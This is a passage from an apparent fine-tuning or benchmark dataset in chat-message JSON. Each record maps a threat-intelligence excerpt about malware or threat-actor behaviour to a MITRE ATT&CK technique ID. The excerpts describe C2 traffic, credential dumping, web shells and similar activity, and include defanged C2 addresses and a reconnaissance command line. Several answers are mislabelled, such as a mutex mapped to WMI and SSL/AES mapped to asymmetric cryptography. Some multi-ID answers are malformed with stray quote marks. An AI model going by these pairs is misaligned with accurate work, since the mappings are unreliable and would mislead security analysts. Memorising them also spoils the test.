tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak has used a VBScript named \"ggldr\" that uses Google Apps Script, Sheets, and Forms services for C2." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "iKitten will zip up the /Library/Keychains directory before exfiltrating it." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once settles on victim’s information systems, Egregor communicates with its Command and Control servers via HTTPS protocol so as to drop scripts or dynamic link libraries on infected hosts. You can find the list of C2 identified during investigations in section “IP Addresses" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxxZ can download and execute additional files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RAT is able to delete files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This is likely to make it appear as if nothing is amiss to the user (as high CPU usage is a red flag of cryptocurrency-mining malware" }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Honeybee launches a DLL file that gets executed as a service using svchost.exe" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has used \"mshta.exe\" to execute malicious payloads." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a tool that can copy files to remote machines." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers the MAC address of the victim’s machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mis-Type has been injected directly into a running process, including `explorer.exe`." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collected the victim computer name, OS version, and architecture type and sent the information to its C2 server. also enumerated all available drives on the victim's machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has infected victims using watering holes." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "P.A.S. Webshell can gain remote access and execution on target web servers." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "build_downer has the ability to send system volume information to C2." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ADVSTORESHELL can delete files and directories." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The observed JSS Loader infection led to the download and execution of a setup VBScript from https[:]//petshopbook[.]com" }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 used various types of scripting to perform operations, including batch scripts." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to create a remote shell and execute specified commands." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ProLock can remove files containing its payload after they are executed." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Frankenstein, the threat actors ran encoded commands from the command line." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SEKURLSA::Pth module can impersonate a user, with only a password hash, to execute arbitrary commands." }, { "role": "assistant", "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has acquired servers to host their malicious tools." }, { "role": "assistant", "content": "T1583.004 - Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "All the strings used by the malware are encrypted and are decrypted by Rijndael symmetric encryption algorithm in the “<Module>.\\u200E” function" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the dwell time value for the active mode has been set, but the package has not been received, the dwell time value is incremented by the dwell time value for the active period" }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed can call regsvr32.exe for execution." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has obfuscated .NET executables by inserting junk code." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete's collected data is encrypted with AES before exfiltration." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWiper can determine the OS version, bitness, and enumerate physical drives on a targeted host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Alongside evidence of compromise of the organization itself, Symantec also found a copy of one of the company’s own files, relating to its messaging software, on a staging server used by Chafer. The file was in a directory alongside a number of hacking tools used by the attackers" }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can list running services." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy uses SSL and AES ECB for encrypting C2 communications." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil)." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak encrypts the message body of HTTP traffic with RC2 (in CBC mode). Carbanak also uses XOR with random keys for its communications." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. We assess with moderate confidence that these documents were sent to victims via phishing emails. One such trojanized document was created on April 23, 2019. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. Screenshot of the stager found in the document The stager then reached out to the actor-controlled C2 server located at hxxp://38[.]132[.]99[.]167/crf.txt. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. rCecms=BlackWater\". Notably, the trojanized document's macro was also called \"BlackWater,\" and the value \"BlackWater\" was hard coded into the PowerShell script" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets." }, { "role": "assistant", "content": "T1566.003 - Spearphishing via Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Prikormka contains a keylogger module that collects keystrokes and the titles of foreground windows." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Avaddon has used encrypted strings." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The TajMahal framework is an intriguing discovery that’s of great interest, not least for its high level of technical sophistication, which is beyond any doubt. For example, it has its own indexer, emergency C2s, is capable of stealing specific files from external drives when they become available again, etc" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery', 'T1119 - Automated Collection', 'T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors accessed and collected credentials from password managers." }, { "role": "assistant", "content": "T1555.005 - Password Managers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When G-Data published on Turla/Uroburos back in February, several questions remained unanswered. One big unknown was the infection vector for Turla (aka Snake or Uroburos). Our analysis indicates that victims are infected via a sophisticated multi-stage attack, which begins with the Epic Turla. In time, as the attackers gain confidence, this is upgraded to more sophisticated backdoors, such as the Carbon/Cobra system. Sometimes, both backdoors are run in tandem, and used to “rescue” each other if communications are lost with one of the backdoors" }, { "role": "assistant", "content": "T1124 - System Time Discovery', 'T1057 - Process Discovery', 'T1049 - System Network Connections Discovery', 'T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally, the loader spawns cmd.exe to perform a series of reconnaissance commands to obtain information about the network and domain" }, { "role": "assistant", "content": "T1482 - Domain Trust Discovery', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We’ve identified two such files: settings.db sdfg3d.db Here’s how such a database file appears: These are BASE64 encoded and use the same RC4 encryption key as the malware configuration" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Next, the loader checks that it’s not running in a virtualized environment (VMWare or Hyper-V) or under a debugger. For the hardware virtualization check, the loader obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list" }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "..   After obtaining a session ID and pre-shared key, the PowerShell script will continue to communicate with its C2 server to obtain data to treat as a command" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks." }, { "role": "assistant", "content": "T1119 - Automated Collection', 'T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pandora can start and inject code into a new `svchost` process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stealth Falcon malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some versions of UPPERCUT have used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LazyScripter had downloaded additional tools to a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZLib mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Should a removable drive be discovered, the plugin will seek any files residing on this device based on the plugin’s configured list. In this particular instance, the malware will seek out the following file types" }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silent Librarian has cloned victim organization login pages and staged them for later use in credential harvesting campaigns. Silent Librarian has also made use of a variety of URL shorteners for these staged websites." }, { "role": "assistant", "content": "T1608.005 - Link Target" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HTTPBrowser's installer contains a malicious file named navlu.dll to decrypt and run the RAT. navlu.dll is also the name of a legitimate Symantec DLL." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has lured victims into clicking a malicious link delivered through spearphishing." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Maze creates a mutex with the name “Global\\x” where x is a special value that is unique per machine. For example, in the next screenshot (some information has been deleted to anonymize the machine used for the analysis) is an example of this behavior" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WannaCry searches for variety of user files by file extension before encrypting them using RSA and AES, including Office, PDF, image, audio, video, source code, archive/compression format, and key and certificate files." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kerrdown can decode, decrypt, and decompress multiple layers of shellcode." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAWKBALL has used an OLE object that uses Equation Editor to drop the embedded shellcode." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We found four different trojaned binaries in use since July 2019. The 5kplayer, driver pack and Firefox trojanized software use a service to achieve persistence. The VPNpro trojanized application uses an AutoRun registry key, as mentioned in the publication released before July 2019. After that, it will check if ESET or BitDefender antivirus are installed before dropping the malware" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has been known to use credential dumping." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrongPity has been bundled with legitimate software installation files for disguise." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypted a .dll payload using RTL and a custom encryption algorithm. has also obfuscated payloads with base64, XOR, and RC4." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Commands under \"net user\" can be used in Net to gather information about and manipulate user accounts." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound malware has communicated with its C2 server over TCP port 4443 using HTTP." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "(Source: Dell SecureWorks) Appendix C — OwaAuth web shell analysis OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CreepyDrive can use legitimate OAuth refresh tokens to authenticate with OneDrive." }, { "role": "assistant", "content": "T1550.001 - Application Access Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has performed timestomping on victim files." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LitePower can take system screenshots and save them to `%AppData%`." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tonto Team has used PowerShell to download additional payloads." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the credential vault and DPAPI." }, { "role": "assistant", "content": "T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RogueRobin decodes an embedded executable using base64 and decompresses it." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to upload information about all running processes to its C2 server." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can deliver trojanized versions of software and documents, relying on user execution." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted" }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors discovered removable disks attached to a system." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PyDCrypt has used `cmd.exe` for execution." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The BazarLoader DLL was immediately copied to another location and made persistent through the Windows registry" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1112 - Modify Registry', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can use known credentials to run commands and spawn processes as a local user account." }, { "role": "assistant", "content": "T1078.003 - Valid Accounts: Local Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Milan has run `C:\\Windows\\system32\\cmd.exe /c cmd /c dir c:\\users\\ /s 2>&1` to discover local accounts." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to gather system information from the victim’s machine." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET saves a screen capture of the victim's system with a numbered filename and \".jpg\" extension. Screen captures are taken at specified intervals based on the system." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: 